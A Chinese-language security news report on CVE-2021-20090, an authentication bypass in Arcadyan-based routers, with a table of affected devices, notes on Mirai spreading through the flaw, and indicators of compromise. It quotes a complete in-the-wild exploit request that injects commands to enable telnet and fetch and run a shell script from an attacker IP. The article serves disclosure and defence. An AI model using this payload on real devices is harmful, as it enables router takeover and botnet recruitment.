新漏洞正被在野利用,影响数百万路由器
CVE-2021-20090是一个由Tenable发现并在2021年8月3日公布的漏洞。现在,研究人员发现了其正在被在野利用。
该漏洞是一个路径绕过漏洞,可导致认证绕过,攻击者可以利用其接管受影响设备的控制权。
根据 Tenable 的相关信息披露,CVE-2021-20090 漏洞被发现实际存在于 Arcadyan 固件中,这不仅影响了最初发现的 Buffalo 路由器,还影响了更多的设备。
影响范围如下所示:
厂商 | 设备 | 版本 |
|---|---|---|
ADB | ADSL wireless IAD router | 1.26S-R-3P |
Arcadyan | ARV7519 | 00.96.00.96.617ES |
Arcadyan | VRV9517 | 6.00.17 build04 |
Arcadyan | VGV7519 | 3.01.116 |
Arcadyan | VRV9518 | 1.01.00 build44 |
ASMAX | BBR-4MG / SMC7908 ADSL | 0.08 |
ASUS | DSL-AC88U (Arc VRV9517) | 1.10.05 build502 |
ASUS | DSL-AC87VG (Arc VRV9510) | 1.05.18 build305 |
ASUS | DSL-AC3100 | 1.10.05 build503 |
ASUS | DSL-AC68VG | 5.00.08 build272 |
Beeline | Smart Box Flash | 1.00.13_beta4 |
British Telecom | WE410443-SA | 1.02.12 build02 |
Buffalo | WSR-2533DHPL2 | 1.02 |
Buffalo | WSR-2533DHP3 | 1.24 |
Buffalo | BBR-4HG | |
Buffalo | BBR-4MG | 2.08 Release 0002 |
Buffalo | WSR-3200AX4S | 1.1 |
Buffalo | WSR-1166DHP2 | 1.15 |
Buffalo | WXR-5700AX7S | 1.11 |
Deutsche Telekom | Speedport Smart 3 | 010137.4.8.001.0 |
HughesNet | HT2000W | 0.10.10 |
KPN | ExperiaBox V10A (Arcadyan VRV9517) | 5.00.48 build453 |
KPN | VGV7519 | 3.01.116 |
O2 | HomeBox 6441 | 1.01.36 |
Orange | LiveBox Fibra (PRV3399) | 00.96.00.96.617ES |
Skinny | Smart Modem (Arcadyan VRV9517) | 6.00.16 build01 |
SparkNZ | Smart Modem (Arcadyan VRV9517) | 6.00.17 build04 |
Telecom (Argentina) | Arcadyan VRV9518VAC23-A-OS-AM | 1.01.00 build44 |
TelMex | PRV33AC | 1.31.005.0012 |
TelMex | VRV7006 | |
Telstra | Smart Modem Gen 2 (LH1000) | 0.13.01r |
Telus | WiFi Hub (PRV65B444A-S-TS) | v3.00.20 |
Telus | NH20A | 1.00.10debug build06 |
Verizon | Fios G3100 | 1.5.0.10 |
Vodafone | EasyBox 904 | 4.16 |
Vodafone | EasyBox 903 | 30.05.714 |
Vodafone | EasyBox 802 | 20.02.226 |
在野利用
Juniper 威胁实验室近期也发现攻击者正在在野利用编号为 CVE-2021-20090 的身份验证绕过漏洞,攻击者通过其传播 Mirai 恶意软件。
POST /images/..%2fapply_abstract.cgi HTTP/1.1 Connection: close User-Agent: Dark action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7%0AARC_SYS_TelnetdEnable=1&%0AARC_SYS_=cd+/tmp;wget+http://212.192.241.72/lolol.sh;curl+-O+http://212.192.241.72/lolol.sh;chmod+777+lolol.sh;sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4不止 CVE-2021-20090,新发现的攻击团伙也频繁利用新漏洞扩充军火库:
CVE-2020-29557(DLink routers) CVE-2021-1497(Cisco HyperFlex) CVE-2021-1498(Cisco HyperFlex) CVE-2021-31755(Tenda AC11) CVE-2021-22502(MicroFocus OBR) CVE-2021-22506(MicroFocus AM) exploit-db 未分配 CVE 编号但存在 PoC 的 exploit
IOC
27.22.80.19 212.192.241.729793ac5afd1be5ec55476d2c205260d1b7af6db7cc29a9dc0f7fbee68a177c7873edf8bfbbeaccdd84204f24402dcf488c3533be2682724e5906396b9237411d8bb454cd942ce6680f083edf88ffa31661a47a45eb3681e1b36dd05043315399f83eadaa00e81ad51e3ab479b900b981346895b99d045a6b6f77491c3132b-58ce4bc34e321b31926fd2fa1696136187b13864dfa03fba6848e59f9f72bfa952980331cf89f3e6026b33b8f1bfa1c304295b9327311661d7927f78824f04cf528904f9b2e029595365f4f4426069b274810510908c7dd23a3791a831f51e9f1fc283f932f30756408a59dac97a6965eb792915242214d590eab1c6cb049148582c2f5bbf35afc7335f789e420c23c43a069ecfcca1a8f9fac5cd554a7a769440e70764ef9800c1d09f965fbb9698d0eda52448b23772d118f2f2c4ba37b59fc20参考来源
SecurityAffairs Juniper Tenable